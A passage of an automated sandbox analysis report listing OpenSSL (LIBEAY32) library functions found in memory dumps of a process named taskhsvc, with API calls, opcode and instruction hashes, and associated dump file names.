                                                            • Opcode Fuzzy Hash: a4062dd3ae0b340409a700c8245888c8c6db627f5a9576bf76f03c3a45acd17d
                                                            • Instruction Fuzzy Hash: 6231CCB55093419FD720DF2AC58069BFBF4AF88744F11892EE9D987700E770E844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF76C30 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_new_ex_dataR_put_error
                                                            • String ID: S$i$m
                                                            • API String ID: 1702480789-321681027
                                                            • Opcode ID: 13f5e50e12299b1329f8e0e665c97edd94fcbc6a4309c1b165b253438020e4c2
                                                            • Instruction ID: 44e797905e1fca6f0c663bfd3618ca5014a8acf4a85254efb02d05dda212eb89
                                                            • Opcode Fuzzy Hash: 13f5e50e12299b1329f8e0e665c97edd94fcbc6a4309c1b165b253438020e4c2
                                                            • Instruction Fuzzy Hash: 6D1104B15193008FDB509F28E58434BBBF4EB49348F16C95DE8A88B744E775D9488FA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF62EF0 Relevance: 13.6, APIs: 9, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$sk_value$lh_freesk_freesk_num
                                                            • String ID:
                                                            • API String ID: 3945219446-0
                                                            • Opcode ID: a5f9d1313875a74777359ed2798103018531961475535b8b828a69983b0d24f8
                                                            • Instruction ID: df4f33ef843da0c86ce1f40754c6c77383c6bfaede1a8b851941a418de7d248e
                                                            • Opcode Fuzzy Hash: a5f9d1313875a74777359ed2798103018531961475535b8b828a69983b0d24f8
                                                            • Instruction Fuzzy Hash: 58312974609B018BDB10DF7AC08465BB7F1AF84718F228A2DE9E58BF44D772E8458B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED2CD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc$O_realloc
                                                            • String ID: e
                                                            • API String ID: 1506631173-4024072794
                                                            • Opcode ID: cfb08acaa75577074f750206fc87f82a6fdf9f67e541578d9a26172c868343df
                                                            • Instruction ID: 9afcbd6fa55eebd2d5a1e3516698901b9e5b47138557bce8eb3fe37cd455ae6a
                                                            • Opcode Fuzzy Hash: cfb08acaa75577074f750206fc87f82a6fdf9f67e541578d9a26172c868343df
                                                            • Instruction Fuzzy Hash: 71410FB16043018FDB00CF29C98874ABBF0AF89318F26C569E9888F745D379E905CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEFAFA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OPENSSL_gmtime.LIBEAY32 ref: 6CEFAFD4
                                                              • Part of subcall function 6CE26EC0: gmtime.MSVCRT ref: 6CE26EDC
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CEFB0D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_type_newL_gmtimegmtime
                                                            • String ID: A$s
                                                            • API String ID: 3530809405-3070099397
                                                            • Opcode ID: 6b981ec93dffef46e8501a291c1cc27634233899de9a6e19f3e2b97576d72206
                                                            • Instruction ID: 705cd8f6b0173cfd9dcdf65398959075c17b46fa93139e3cd4b54e6b9944f748
                                                            • Opcode Fuzzy Hash: 6b981ec93dffef46e8501a291c1cc27634233899de9a6e19f3e2b97576d72206
                                                            • Instruction Fuzzy Hash: 9231C0B1609701CFD710DF29C58065BBBF4AF88758F21892DE4A88BB00E735E8499F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE80C00 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_nnmod
                                                            • String ID:
                                                            • API String ID: 1640933438-0
                                                            • Opcode ID: b69ef7e2f585053a84459a3332655551670263b0fa01afef81274690ecf7150c
                                                            • Instruction ID: 47794130ef4069ff527e6697d07cc5297d11219f560087e647aee23faad01e32
                                                            • Opcode Fuzzy Hash: b69ef7e2f585053a84459a3332655551670263b0fa01afef81274690ecf7150c
                                                            • Instruction Fuzzy Hash: 4BD14A7160A7418FD304CF19C98065AB7F2FF89318F29C92DE8998B751D735E846CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF1CF60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF1CF87
                                                            • X509_ALGOR_new.LIBEAY32 ref: 6CF1CF9C
                                                              • Part of subcall function 6CF04370: ASN1_item_new.LIBEAY32 ref: 6CF04385
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF1CFAF
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF1D057
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$G_type_newN1_item_newR_newR_put_errorX509_
                                                            • String ID: A$m
                                                            • API String ID: 3201979453-1290977958
                                                            • Opcode ID: 0521b1d550938cf9a705dca90b010af9da02c268ecfc8ad66e54a26d681d79db
                                                            • Instruction ID: 1f2a1ee307aa95eb24af85203ab491357da466559b55b8062afc23b03b905c38
                                                            • Opcode Fuzzy Hash: 0521b1d550938cf9a705dca90b010af9da02c268ecfc8ad66e54a26d681d79db
                                                            • Instruction Fuzzy Hash: CA2127B12193018FEB00DF24D49434B7BF1AB44348F118A5DD9998FA89D7BAD54ACFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3ADA0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocR_put_error
                                                            • String ID: A$T$V
                                                            • API String ID: 2513334388-4191120472
                                                            • Opcode ID: 8dfdefde0a03cdc6394702fa3622e77ee90d774775e9dcff6a9567e25388fcc5
                                                            • Instruction ID: e3c71541d3810022cd67a06a4a880a59ef309d98ecf81aff1931d6975dd2efb7
                                                            • Opcode Fuzzy Hash: 8dfdefde0a03cdc6394702fa3622e77ee90d774775e9dcff6a9567e25388fcc5
                                                            • Instruction Fuzzy Hash: 5F11F372118702ABEB00DF66C64034BBBF4BB85308F02991CE6A89B640D774A5498BE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2ACE9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC63
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC6B
                                                            • ERR_put_error.LIBEAY32 ref: 6CE2AD1B
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AD2F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
